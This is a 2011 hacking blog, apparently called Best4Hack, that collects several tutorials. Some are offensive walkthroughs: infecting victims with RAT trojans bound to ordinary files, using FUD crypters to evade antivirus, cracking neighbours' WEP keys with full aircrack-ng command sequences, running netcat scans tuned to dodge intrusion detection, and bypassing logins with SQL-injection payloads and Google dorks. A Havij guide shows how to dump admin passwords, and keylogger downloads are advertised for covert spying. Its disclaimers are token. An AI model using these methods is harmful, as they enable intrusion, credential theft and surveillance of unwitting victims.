Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Monday, 31 October 2011

How to Hack the remote system using Remote Administration Tools?

What is RATs (Remote Administration Tools)?
Newbie : Hello Best4hack , i heard a new Keyword RATs in hacking world? what is it? I know only about this rats.

Best4hack :  RATs are known as Remote Administration Tools. I hope you understand what it does from the name itself.

Newbie : So it is used for hacking remote pc right?

Best4hack : Yes it is used for hacking into victim computers remotely. Using RATs you can get control over the remote PCs.

Newbie : OK. Can you explain more about the use of RATs?

Best4hack : yes Sure. Here it is

Use of RATs(Remote Administration Tools)

You are able to install any malicious software(keyloggers...)
Able to monitor the Chat windows
Turn off the system remotely
You can disable antivirus/registry/restore point
Stealing the passwords and License key of their software.
Able to access Control panel
You can add or remove any programs
Show Fake Error messages to victim
Control Printers
Format the Entire Hard drive.
Open FTP(File Transfer Protocl) and transfer files
Control Internet Browser
more fun...



N00b: Thank you Best4hack. How to do that?

How to work with RATs ?
Step 1:

First of all you have to download Remote Administration Software and install in your system.

Step 2:
Then you have to create a server using the RAT software. Here , server is our trojan that is going to bring control over the victims system.

Step 3:
Bind the server with any files(JPEG,doc,txt...). You can bind this using some binder. Most of RATs provides Binding option also.

Step 4:
Send this file to Victim. Once the victim open the file, the server will start to run. It will disable Antivirus, registry,...depending on your configuration.

Step 5:
Find the IP address of the Victim(there is different methods to find IP address, read my previous articles). Once you got the IP address, using your Remote Administration Tool, you can connect to the Remote System.

Now World is under your control.


Noob: wow. hey Best4hack I have heard some where about Reverse connection in RATs. what is that?

Connections in RATs
Direct Connection:
In Direct connection, Our system(Remote administration tool installed) is client and the victim system act as server. Our system connects to the Remote System and take control over the system. You have to find the IP address of Victim and connects to the system. Some high secure Firewalls will block the Connecting to the system on Open ports.


Reverse Connection:
Reverse connections is for bypass the Firewall Restrictions on Open ports. Firewall Restrict the Open ports but not the outgoing traffics.
In a Direct connection, client connects with Server using the Open port of Server.
In reverse connection, client open the ports and server connects to the open port.


I think you confused little bit , right? In simple words,
Victim computer connects automatically to our computer in reverse connection (in Direct connection, we have to connect to victim system using their IP address).

got it?

Advantages of Reverse Connection:
  • You don't need to know what is victim IP address(because it is connecting to our system).
  • Bypassing the Firewall Restrictions

Here is the List of Popular RAT Softwares:
Popular Remote Administration Softwares List
  1. Back Orifice
  2. Bifrost[9]
  3. Bandook RAT
  4. Cerberus RAT
  5. Poison Ivy
  6. Darkcomet-RAT
  7. Sub Seven (Sub7)
  8. TeamViewer
  9. NetCAR
  10. Netop Remote Control
  11. Netop OnDemand
  12. Netop Mobile & Embedded
  13. Y3k RAT[11]
  14. Optix Pro
  15. LANfiltrator
  16. ProRat
  17. Turkojan
  18. Nuclear Rat
  19. Shark Rat
  20. Lost door
  21. DarkComet-RAT
  22. CyberGate

Undetectable by Antivirus:
N00b: Most of antivirus detects the server file as virus. What i can do?

BreakTheSec: So you don't know about FUD ?

N00b: What is FUD menas to?
BreakTheSec: follow this link to know about Crypters

N00b: Can i get traced by victim?
BreakTheSec: No.  A system gets over 300 connections.  It is hard to trace you.

Note:
This is just for educational purpose only. Using RAT to control unauthorized system is completely a crime. So Please don't try to do. (Discussing or Reading about thief technique is not crime but implementing)

How to make Virus/spyware Undetectable by all antivirus?

Usually if you create malicous programs(virus,spyware...), the antivirus will detect easily. It will scan the source code. if it finds the malicious source codes, then it will alert as "virus". To know more details about antiviru program read this article:
How does Anti Virus detects viruses

I hope you know about the antivirus functions completely. In that article, i have mentioned "Crypter" keyword. Now let us see more about Crypter.




What is Crypter?

You can make the any type of malicious programs(virus,spyware,...) undetectable by all antivirus.

How crypter makes undetectable virus?

i have told that crypter will make virus undetectable. ok. How it will do? It will encrypt the malcious code.
For instance,
In "mission impossible" movie, the villaim wear mask and make heroin to believe that he is the hero.
Likewise , this crypter will create a masked form of Malicious codes. So the Antivirus programs will think that these codes are safe to use.

Drawback of Crypter
Now a days the antivirus programs upgraded to detect the malicious codes. If the crypter software is publicaly available, the antivirus get the algorithm of those crypter and include in their virus definitions. So if the virus is encrypted with that crypter, antivirus easily find that it is malicious code.

Fully Undetectable Crypter(FUD)
The crypter that is not publicaly available is known as FUD crypter. so FUD crypter will be useful to create fully undetectable virus programs.

You can download the latest crypter from hacking related forums.

Use the crypter as soon as it is released , the antivirus will find the crypter algorithm within certain days. so you have to use it as soon as possible.

How Does Anti virus detects viruses?

I hope you know what is computer Anti Virus. But you may not know how the anti virus works.  Here i am sharing how the antivirus software works. 


What you know about Anti Virus software?

Antivirus software gives protection against the viruses and Malware. Antivirus can detect the malicious software ,then delete or put it in quarantine. 



The process behind the Anti Virus

The Antivirus follows two methods to detect the malicious software. They are
  • Virus Dictionary Based Detection
  • Suspicious Activity Detection
Virus Dictionary Based Detection
In this method, Antivirus manage a dictionary file which has the identified virus signatures. Whenever an executable is running, antivirus will check the executable file source code with the dictionary.  If the source code match with any virus signature, then antivirus will immediately inform you that the virus is found.
Antivirus will check the executable file whenever file is opened or created or emailed or downloading.

Example:
Let us assume the malicious code is "11010011" and this code is in dictionary file.  If any executable file runs with the above malicious code, the antivirus immediately block and alerts the user. 

Day to day the hackers can create new viruses, the source code of virus will vary.  The antivirus can not detect the virus with old Signature of viruses.  You have to update the virus signature so that it can detect new viruses.


Drawback of this Method

Hackers found a hacking trick to bypass this security method, The Crypter.  Yes,  hackers can encrypt the source code into different source code such that it will look like safest source code.  So if the antivirus checks for the source code, it won't find the malicious code (because it is another form). (I will give detailed explanation about the crypter in my next post.).  The drawback can be solved by including the crypted malicious code to dictionary file. 

 Suspicious Activity Detection
The suspicious activity detection method is more effective than the Dictionary based approach.  It can detect even a new virus. Antivirus observes the behavior of the executable file. If the executable file does any illegal process or create any executable file, the antivirus will block the executable file and alert the user . 


Drawback
It is annoying process.  The accuracy is less so it may detect any safe executable file as virus.

Remotely Access another Computers using Google Chrome


New chrome extension named as Chrome Remote Desktop BETA that allows users to access another computer remotely. This is first software that demonstrate the Core Chrome Remoting Technology.

This version enables users to share with or get access to another computer by providing a one-time authentication code. Access is given only to the specific person the user identifies for one time only, and the sharing session is fully secured. One potential use of this version is the remote IT helpdesk case. The helpdesk can use the Chrome Remote Desktop BETA to help another user, while conversely a user can receive help by setting up a sharing session without leaving their desk. Additional use cases such as being able to access your own computer remotely are coming soon.

Chrome Remote Desktop BETA is fully cross-platform, so you can connect any two computers that have a Chrome browser, including Windows, Linux, Mac and Chromebooks.

This app can access:
Your data on accounts.google.com, www.google.com, and 2 other websites - see all
All data on your computer and the websites you visit
Your tabs and browsing activity

Private Access Codes:



As per the user review:
It is performing good. You may need better internet connection.

Scan Open Ports/Services of Target: Netcat

Prerequisites: None

Countermeasures: Uninstall/disable fix unnecessary services, Intrusion
Detection Systems (IDS) Log and Event Log review

Description: The netcat application has many uses; one is the ability to
scan a target for open ports and services. Another utility, cryptcat, is
almost identical except that it operates with encryption.
Procedure: From a DOS prompt, type the following with the syntax of:
nc <options > <Hostname or IP Address> <Port Range>
netcat
_ The –v option instructs netcat to run in verbose mode, allowing you
to see the progress of the scan.
_ The –r option instructs netcat to randomize local and remote ports in
an attempt to elude any intrusion detection systems.
_ The –w2 option instructs netcat to wait 2 seconds between each port
scanned to help elude any intrusion detection systems.
_ The –z option instructs netcat to operate in a zero-I/O (Input/Output)
mode. It is best to use the –z when scanning with netcat.
_ The 1-1024 instructs netcat to scan port 1-1024.
In this example, the target has the following ports open:
_ 80 (Web)
_ 7 (Echo)
_ 13 (daytime)
_ 21 (FTP)
_ 17 (Quote of the Day)
_ 445 (Windows Share)
_ 9 (discard)
_ 139 (Windows Share)
_ 19 (Character Generator)
_ 135 (epmap)
_ 443 (HTTPS)
_ 25 (Simple Mail Transfer Protocol [SMTP])
Note: From the results of this example the “low hanging fruit” ports are:
_ 7, 13, 17, 9, and 19 as these ports can easily be used to create a Denial of Service (DoS). These ports should not be open to the Internet.

What is A Hacker

A hacker is known to build things, solve problems and not break or crack any system. The computer industry initially hired good programmers to make sure how to full proof their system. However, over the years, the media, journalism and writers have played a very important role in changing the real meaning of the word hacker. They themselves are very confused in the term Hacker and a Cracker. A typical definition of a Hacker, that today comes to you mind is that a Hacker, is a person who tries to gain unauthorized access to any property and computers. The term Hacker came as slang from the computer world. So, different people have given different definitions to it. But what remains the common point is, that whenever you hear the word hacker, the first think that comes to your mind is always negative and bad. However, the real meaning of a hacker is a programmer who really finds it thrilling to learn more about it, who likes to explore more details about the programming language and hence stretches his or her capabilities more than any average person.
Crackers are people who get cheap thrill out of cracking computer codes, and breaking into systems. Hence, these are the people who have negativity around them and they only believe in breaking or cracking an access to any kind of system that they have no authorization to. They are malicious annoying people who try to uncover sensitive information by poking their unwanted nose everywhere. Hackers on the other hand are knowledgeable and responsible people. They like to take intellectual challenges and like to overcome all limitations that are there in a particular system. Learning to hack is not very easy. It is a special gift that is only given to a selected few. Only people who are good in searching and keeping themselves updated about the latest technology are the one who are blessed with it. Only being good with computers does not qualify one to be a good hacker. Some people also reapply their hacking knowledge to different fields like music and electronic. It is also said the every hacker is independent of any kind of hack he does, call it in the computer field or elsewhere. Hackers are known to be ethical, wise in their practice.
The realty is: 'Hackers build things, crackers break them.'
Today the hacker world has been given 3 different names. The White hat hackers, who do all the good things and are positively motivated people, Then we have the Black hat hackers also called the crackers who are usually into negative work of cracking and breaking into someone's system and finally the third and the last are the grey hat hackers who explore the best of both the worlds. To conclude, we can say that Hackers are people who are skilled programmers that work for a positive cause or a goal, either for themselves or for an organization which could be private as in an industry or for the government.

›Thinking of A Hacker


The thinking of a hacker is very much the same as that of a good program developer. Hackers who have been successful have developed a common strategy over a period of time. This strategy is to very patiently and carefully document every step, which is what the programmers do. They are good at analyzing and following a methodical approach of investigation. So when they start they don't have much as in the background, they start from the starch and gradually build what is called the entire roadmap or game plan.
It is a known fact that in order to think like a master hacker one should imitated all the big hackers both intellectually and emotionally. As they always work on a different platform and it is the platform of Self Belief.
1. The typical thinking of a Hacker is that, they believe that the world is full of ongoing problems which continuously need solutions to it. So looking for solutions should be the ultimate aim and not giving up till the time the problem is cracked.
2. Another fundamental that they work on is that, the same wheel should not be invented twice as it will be a waste of time and effort both. Brains with creativity should be used for new proposes and not older ones. So, they believe in the theory that time is precious and make the best out of it.
3. The third fundamental truth that they believe in is that, repetition is what leads to success and no word like boredom can be found in their dictionary.
4. The next good thing they believe in is Freedom. Most of the hackers work independently and that is a strong foundation for them to grow. It is said that freedom has no limit to the growth of an individual.
5. No replacement for a good attitude. An attitude to fight and not flight. One can give up whenever he or she wants. It is only the attitude that makes you different from the other.
6. Hackers believe in a value system that is not negotiable and do not compromise on it, because if they do then they would be crackers and not hackers.
Documentation is said to be the wisest thing that any developer a simple programmer or a hacker maintains. At times finding solutions is so difficult that is only the documentation that can help one understand the entire process all over again. It is like hunting for a treasure hunt in a jungle with small clues that take you to the next clue and one step closer to the final gift.

Thursday, 27 October 2011

Use Pen drive As RAM - Speed Up Computer

Today I,ll show you a nice trick to boost the working speed of your computer as now a days there are large number of programs and softwares which require a large amount of memory to be run properly. And often you don’t have that required memory installed as RAM. I,ll talk about this trick generally so that it may be applicable to every windows. First I,ll show you a manual way and after that I,ll provide you a software for this purpose. The basic scheme is this that we are going to use a pendrive or USB drive as a RAM, yes it is possible all the memory available in a removable pendrive/USB can be converted into RAM to increase the working speed of the computer.

Manual Method to Convert USB/Pendrive Into RAM:-

Here is the required procedure for converting USB/pendrive memory into RAM manually…
1) Plug your pendrive into PC/laptop.
2) Right Click On My Computer.
3) Open up properties.
4) Go to Advanced Option.
5) Now select Settings of Performance.
6) Again Click on the Advanced Button which is shown In the popup Window.
7) Now click on Change button shown in Virtual memory.
8) Now select the available memory of your removable USB/Pendrive.
9) Set the value and apply the changes.
10) Restart your PC/Laptop and Thus you are done.

Using eBoostr Software to Convert USB/Pendrive into RAM:-

A clean software is also present for this purpose which is known as eBoostr, It will convert your removable device memory into RAM and thus computer speed will be increased to a large extent.
Is Eboostr Free and which windows is capable of running it?
No, Eboostr is not free and it is available at a non-expire able trial version it means that we can use it continuously for just 4 hours. After that our PC will have to be restarted in order to make eBoostr active and working again. Well 4 hours for every boot are enough for a normal computer user. If you wan’t to use it without any break then kindly purchase this full version here. After Downloading Just Run it and Use as its usage is quite simple that’s why no guide is necessary for it.
The software is very handy in the sense that it is just 1MB to download. It supports Windows XP, Windows 2000 and Windows 2003 and is available in 36 languages. It requires USB 2.0 drive or memory card for operation and USB 1.1 is not supported as they tend to be very slow and don’t work at required speed. So, in short Pentium four is better for its usage.
Give this method a try and so tell me about your experience in comments…! Some day later I,ll provide you free eboostr full version.


Tuesday, 25 October 2011

Wi-Fi Network Hacking

This tutorial will explain that how to crack wep key using Backtrack..!!




Step 1:-
First Download Backtrack  from the following link:
Step 2:-
Burn the iso image on CD and boot your laptop from CD drive
Step 3:-
Select the third boot option(VESA/KDE).
Step 4:-
Once in BT3, click the tiny black box in the lower left corner to load up a
 "Konsole" window.
Step 5:-
Type the following command
airmon-ng
Note down the interface name. In this example wifi0
Step 6:-
airmon-ng stop wifi0
Step 7:-
ifconfig wifi0 down
Step 8:-
macchanger --mac 00:11:22:33:44:66 wifi0
Step 9:-
airmon-ng start wifi0
Step 10:-
airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paper
Note that if the same BSSID is available in the second part with STATION associated with it,
means you some one is accessing that network and our task will be little easier.
If not than don’t worry we will still crack it.
Step 11:-
airodump-ng -c (channel) -w (file name)
Replace
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
--bssid (bssid) wifi0
Note it
Leave this console as it is and start new konsole
Step 12:-
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don’t get Association Successful mesage then keep on trying until
you got success.
Step 13:-
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don’t see ARP ACK and sent packets are not increasing or still 0
than it means no 1 is
accessing that network.But don’t worry you go an optional step,
Leave this console as it is and start new k
Step 14:-
aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
konsole
message than keep on trying until you get success
got an optional step
konsole
–b (bssid) –h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console.
Step 15:-
aircrack-ng -b (bssid) (filename)-
Just wait and watch…..Backtrack will do rest of the work.
Hurray we got the key.

Done..!!


Wireless networks are everywhere; they are widely available, cheap, and easy to setup. To avoid the hassle of setting up a wired network in my own home, I chose to go wireless. After a day of enjoying this wireless freedom, I began thinking about security. How secure is my wireless network? 
I searched the Internet for many days, reading articles, gathering information, and participating on message boards and forums. I soon came to the realization that the best way for me to understand the security of my wireless network would be to test it myself. Many sources said it was easy, few said it was hard.

How a wireless network works
A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs), or clients.
Access points are base stations for the wireless network. They receive and transmit information for the clients to communicate with.
The set of all stations that communicate with each other is referred to as the Basic Service Set (BSS). Every BSS has an Identification known as a BSSID, also known as the MAC address, which is a unique identifier that is associated with  every NIC.
For any client to join a WLAN, it should know the SSID of the WLAN; therefore, the access points typically broadcast their SSID to let the clients know that an AP is in range.
Data streams, known as packets, are sent between the Access Point, and it’s clients. You need no physical access to the network or its wires to pick up these packets, just the right tools. It is with the transmission of these packets that pose the largest security threat to any wireless network.

Wireless Encryption
The majority of home and small business networks are encrypted using the two most popular methods:
  1. WEP & WPA
WEP – Wired Equivalent Privacy – comes in 3 different key lengths: 64, 128, and 256 bits, known as WEP 64, WEP 128, and WEP 256 respectively.  WEP provides a casual level of security but is more compatible with older devices; therefore, it is still used quite extensively. Each WEP key contains a 24 bit Initialization Vector (IV), and a user-defined or automatically generated key; for instance, WEP 128 is a combination of the 24 bit IV and a user entered 26 digit hex key. ((26*4)+24=128)
WEP also comes in WEP2 and WEP+, which are not as common and still as vulnerable as the standard WEP encryption.
WPA – WiFi Protected Access – comes in WPA and WPA2, and was created to resolve several issues found in WEP. Both provide you with good security; however, they are not compatible with older devices and therefore not used as widely. WPA was designed to distribute different keys to each client; however, it is still widely used in a  (not as secure) pre-shared key (PSK) mode, in which every client has the same passphrase.
To fully utilize WPA, a user would need an 802.1x authentication server, which small businesses and typical home users simply cannot afford. WPA utilizes a 48 bit Initialization Vector (IV), twice the size of WEP, which combined with other WEP fixes, allows substantially greater security over WEP.

Packets and IVs
It’s all in the packets. The bottom line is – while you may be able to employ several security features on your WLAN – anything you broadcast over the air can be intercepted, and could be used to compromise the security on your network. If that frightens you, start stringing wires throughout your home.
Every encrypted packet contains a 24 or 48 bit IV, depending on the type of encryption used. Since the pre-shared key is static and could be easily obtained, the purpose of the IV is to encrypt each packet with a different key. For example, to avoid a duplicate encryption key in every packet sent, the IV is constantly changing.  The IV must be known to the client that received the encrypted packet in order to decrypt it; therefore, it is sent in plaintext.
The problem with this method is that the Initialization Vectors are not always the same. In theory, if every IV was different, it would be nearly impossible to obtain the network key; this is not the case. WEP comes with a 24 bit IV; therefore, giving the encryption 16 million unique values that can be used. This may sound like a large number, but when it comes to busy network traffic, it’s not.
Every IV is not different; and this is where the issues arise. Network hackers know that all the keys used to encrypt packets are related by a known IV (since the user entered WEP part of the key is rarely changed); therefore, the only change in the key is 24 bits. Since the IV is randomly chosen, there is a 50% probability that the same IV will repeat after just 5,000 packets; this is known as a collision.
If a hacker knows the content of one packet, he can use the collision to view the contents of the other packet. If enough packets are collected with IV matches, your network’s security can be compromised.

The crack
Two of the most popular programs used for actually cracking the WEP key are Airsnort and Aircrack. Airsnort can be used with the .dump files that Kismet provides; and Aircrack can be used with the .cap files that Airodump provides.
Airsnort can be used on it’s own without any other software capturing packets; although, it has been reported to be extremely unstable in this state, and you should probably not chance loosing all your captured data. A better method would be to let Airsnort recover the encryption key from your Kismet .dump file. Kismet and Airsnort can run simultaneously.
For this demonstration, we’ll be using Aircrack. You can use Airodump to capture the packets, and Aircrack to crack the encryption key at the same time.
With Airodump running, open a new command window and type:
aircrack -f 3 -n 64 -q 3 george.cap
The -f switch followed by a number is the fudgefactor; which is a variable that the program uses to define how thoroughly it scans the .cap file. A larger number will give you a better chance of finding the key, but will usually take longer. The default is 2.
The -n switch followed by 64 represents that you are trying to crack a WEP 64 key. I knew because it was a setup; In the real world there is no way to determine what WEP key length a target access point is using. You may have to try both 64 and 128.
The -q 3 switch was used to display the progress of the software. It can be left out altogether to provide a faster crack; although, if you’ve obtained enough unique IVs, you should not be waiting more than a couple minutes.
-m switch can be used, followed by a MAC address, to filter a specific AP’s usable packets; this would come in handy if you were collecting packets from multiple APs in Airodump.
Aircrack recovered my WEP 64 key within 1 minute using 76,000 unique IVs; the whole process took around 34 minutes.
The same experiment was repeated with WEP 128 and it took about 43 minutes. The reason it was not substantially longer is because I simply let Airplay replay more packets. Sometimes you can get lucky and capture an ARP Request packet within a few minutes; otherwise, it could take a couple hours.



                                                                 WI-FI HACKING TOOLS


I am going to share with you some of my favorite wireless tools that can be used to hack Wi-Fi password using Ubuntu or any other Linux distribution:

Aircrack-ng
Aircrack-ng (a fork of aircrack) is my main tool for cracking Wi-Fi passwords. It has a wireless network detector, a packet sniffer, WEP and WPA/WPA2-PSK cracker, and an analysis tool for 802.11 wireless LANs. Aircrack-ng works with any wireless card whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.

Download: Aircrack-ng


Kismet 
Kismet is a really good network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. It will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. Kismet works in passive mode, which means it is capable of detecting the presence of both wireless access points and wireless clients without sending any log-gable packets.
ismet – does a little more than just detecting networks. Aside from providing every detail about a network except the encryption key, Kismet is a packet sniffer and intrusion detection system.

Download: Kismet


NetStumbler

Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.


Download: NetStumbler


SWScanner
SWScanner is specifically designed to make the whole wardriving process a lot easier. It is also intended to manage many tasks related to wireless networking. SWScanner is compatible with NetStumbler files and can be integrated with GPS devices.
These are only three of the many wireless tools that can get you going in no time, so feel free to explore.

Download: SWScanner

Keylogger Tutorial

Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.

About keyloggers 
key loggersA keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the user. Keylogger is commonly included in rootkits.

A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.

There are other approaches to capturing info about what you are doing.

    * Some keyloggers capture screens, rather than keystrokes.
    * Other keyloggers will secretly turn on video or audio recorders, and transmit what they capture over your internet connection.

A keyloggers might be as simple as an exe and a dll that are placed on a machine and invoked at boot via an entry in the registry. Or a keyloggers could be which boasts these features:

    * Stealth: invisible in process list
    * Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
    * ProBot program files and registry entries are hidden (Windows 2000 / XP)
    * Includes Remote Deployment wizard
    * Active window titles and process names logging
    * Keystroke / password logging
    * Regional keyboard support
    * Keylogging in NT console windows
    * Launched applications list
    * Text snapshots of active applications.
    * Visited Internet URL logger
    * Capture HTTP POST data (including logins/passwords)
    * File and Folder creation/removal logging
    * Mouse activities
    * Workstation user and timestamp recording
    * Log file archiving, separate log files for each user
    * Log file secure encryption
    * Password authentication
    * Invisible operation
    * Native GUI session log presentation
    * Easy log file reports with Instant Viewer 2 Web interface
    * HTML and Text log file export
    * Automatic E-mail log file delivery
    * Easy setup & uninstall wizards
    * Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP 

Tools:

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.



This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.
  • Security - allows you to protect program settings, Hidden Mode and Log file.
  • Application monitoring - keylogger will record the application that was in use that received the keystroke!
  • Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!
  • Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.
  • Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.
  • Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.
  • It records every keystroke. Captures passwords and all other invisible text.
Other Features:
  • Windows 2000/2003/XP/Vista/Windows 7 support
  • Monitors multi-user machines
  • Automatic startup
  • Friendly interface
  • Easy to install
 
Download Ardamax Keylogger (1.94Mb)


Perfect Keylogger for Windows 98/2000/XP/Vista and Windows 7

The latest, improved and most stealth version of Perfect Keylogger is now available only after purchase. To protect the product from abuse and improve its quality for the registered users, we no longer offer the trial version of the latest builds. The localized versions of Perfect Keyloger and 64-bit version are also available after purchase. The last public version is still available
, but keep in mind that it's not the latest and may be flagged by security software.

Download Perfect keylogger

What is SQL injection and how its accomplished!

A large number of websites are vulnerable to SQL injection attacks, I must say that its just the fault of the website admin, Who has designed it. I am going to discuss here that what is SQL injection and how it is accomplished. Now-a-days, many noobs find an SQL error in database by automated scanners and just exploit it for fun. But that is not a good act. Even i haven't used my skills for any bad purpose. This post is about those people who don't know that their website is actually vulnerable to such attack, also i am going to tell you that how its done and how to catch this vulnerability.Due to such vulnerability a Hacker can gain access to your website within a minute, Yes its true.


What is SQL Injection?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
In simple words I must say that hacker injects certain characters in the admin authentication area and gains access as admin.

How is basic SQL injection Accomplished?
Google is very helping in hacking, due to dork technique, Now you will think that what is dork?
Dork: A search enquiry to find a website specific to an attack type etc.
A few dorks are below, which are used to find, vulnerable site:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
(Note: I am not giving all dorks, due to the fact that i might go illegal, You may be just learning but we can't trust everyone.)

These dorks are pasted in the search bar of google.com. and then searched to find the website.

After finding the required target, injection is accomplished, like in the login fields of admin, as password following injections are inserted:
' or '1'='1
' or 'x'='x
(Google to get more, It would be illegal if i post here all.)

In simple words:
Username : Admin
Password : 'or'1'='1

Hit login and you are in, All the sites are not vulnerable and this is just for learning purpose, HackersThirst is not responsible for any harm or damage caused.


That was just a simple tutorial to give you basic information of SQL injection. There are more advanced techniques too. But some other day i will discuss.


How to check that your website is vulnerable?
Well, After reading the basics above you might have got the concept of SQL injection. But many tools are also available to scan your website or server for such errors in database, Note, When error occurs it means that website is vulnerable.
First Method:
Here is an online scanner:
http://webhosting.blackoutaio.com/~sqli/
For example, If you want to scan, www.website-wamiq.com then put this in scanner bar:
inurl:php?=id+site:website-wamiq.com
 If you get:

http://www.website-wamiq.com/product.php?id='3 <== Success

Then it means that website is vulnerable and can be exploited easily by getting the number of colums.
(Note: catid, data, num is also used in addition to id. Simply replace id with your desired value in the dork of scanner.)
Here i got screen shot of a Website with dork "data" instead of "id" vulnerable to the attack it has scanned it overall and here are results:




Second Method:
Here is an automated scanner, Which is for newbies, Just click scan and take rest.
Go to this link to get detailed information on how to find SQL vulnerability in website.
To get Acunetix vulnerability scanner Trial version go here.


Hope, Now you might be aware of SQL injections. Futher information will be posted later.

Update:- Read Further Details below:-
How to Use Havij for SQL injection

How to use Havij for SQL injection

- First of all, Download havij click here to download.
- Install havij and place the shortcut at the desktop, Now find the vulnerable website which is vulnerable to the SQL injection.You can use google dorks for this purpose, I have already told in many tutorials that what google dork is, Most common dorks for sql injection vulnerable site are:-
inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

If you want to get full list of 2000 or more sql injection dorks, then subscribe to us by email and then provide your email in comment forum below like wamiqali [at] hackersthirst.com, inorder to remain safe from robots which can harvest emails.
- After finding the vulnerable website open Havij, lets say the vulnerable site has URL:-
“http://website.com/index.php?module=pages&id=85”
- After opening Havij paste the above URL like this i-e of vulnerable Site:-


- After that hit “Analyze” and thus it will scan site that whether sql injection is possible or not. For security reason I have not shown the name of site which I will use for tutorial purpose.
- It will tell you the type of server and also the type of OS running on the server and will give a message like :- Target Vulnerable if the site is vulnerable.
- Now go to “Tables” and “Get Database” and after getting data bases check all of them and hit “Get Tables” After getting tables of DB’s , select the admin table and hit “Get Columns” , after getting columns now a hacker can check the password and username column and can hit “Get Data”, See pic Below to understand all the button used:-


- Now a You will get data in encrypted form , like mostly in “md5 hash” but we can decrypt it easily by using havij or other online tools present, After decrypting md5 , you have to find “admin page” using havij, in the pic below see the buttons for decrypting md5 and finding admin page, Point the browser to the admin page, where you have to put the decrypted “password” and “username” of the admin to login into the website.


- Thus after successful login into the website as admin the hacker can do whatever he wants.
So, Automated tools have also great importance you can also check your own website for the vulnerability. And yes better is to use your skills in right direction because a real hacker is one who thinks for the benefits not for desctruction, Thanks 

Sunday, 23 October 2011

Truth About “Facebook Hacker’s” Software and all such software which claim to hack password Totally Scam

Today post mainly aims for those newbies who want to learn hacking but don’t know actually what it means? so they tend to think that mainly software exist using them they can hack any thing. But that is a wrong concept you can’t hack anyone by merely some clicks and password of that person may be in front of you. Following I am going to reveal the realities behind such softwares.

Software May have a binded Trojan or Keylogger With it:-

Like mostly in case of Facebook, people try to find out a software and hackers make use of this weakness and often they design fake hacking software in VB (Like I can also designed one in Visual Basic Environment, By just designing some button and text fields and then debugging the software and after testing generating the required .exe, But all will be fake) and attach a Trojan Or Keylogger with that mainly some RAT.

Software Itself can be a phisher:-

Many times the software it self can be a phisher and will ask you to enter your email address and password first, Which will be sent to its creator for sure. And then the hacking page will appear but surely you won’t get any results.
In fact there is not such software for Hacking Facebook, Yahoo, Gmail or Else MSN password of any user, As such companies pay high amount of money to the researchers who make their servers secure so that no hacker can gain un-authorized access to them for bad purpose.

Some Facts I gathered to Assure you that such softwares are Fake:-

First Fact Over Youtube:-

